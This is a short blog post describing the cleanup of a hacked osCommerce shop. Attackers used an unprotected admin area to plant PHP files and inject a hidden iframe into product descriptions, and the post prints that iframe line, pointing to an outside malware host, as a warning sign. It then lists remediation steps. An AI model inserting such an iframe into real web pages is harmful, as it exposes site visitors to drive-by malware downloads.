A few days ago we had someone get in touch as their OS Commerce implementation had been hacked into and their shop had been compromised by a malware distributor.
The shop owner had been alerted by Google Adwords who suspended their account until they got it sorted.
What this particular hack does is creates an invisible iframe in your pages which links through to anohter site without the person browsing the website knowing – the new invisible window then tries to download bad programs onto their computer.
The giveaway with this exploit is to view the page source and if there is the following code:
<iframe src=”http://www.vcp-counter.com/unique/index.php” width=0 height=0 frameborder=0></iframe>
then your site has been hacked.
In this case the hackers got into the admin area as the admin directory was not password protected (should be protected by htaccess), they then uploaded some php files into the images directory which allowed them to go through the site and also gave them access to the mysql database running the e-commerce shop.
Having access to the database they then added the above iframe code to every category and product description in the shop.
What we did to clean it out:
-
Downloaded all site files, scanned and cleansed
Removed all of the files the hackers had added
Scanned the database for the ‘iframe’ code and removed – in this case it was in every ‘description’ field in the products_description and categories_description tables in the database – we removed the iframe links from the descriptions
Renamed the admin area so that it was not admin any more
Changed the ftp password on the server – removed ftp access and secured the site so it can only be accessed by sftp (secure ftp)
Changed the database username and password to something different
Password protected the new admin area
After this the site owner was able to restart their adwords campaign and start selling again.
0 comments ↓
There are no comments yet...Kick things off by filling out the form below.
Leave a Comment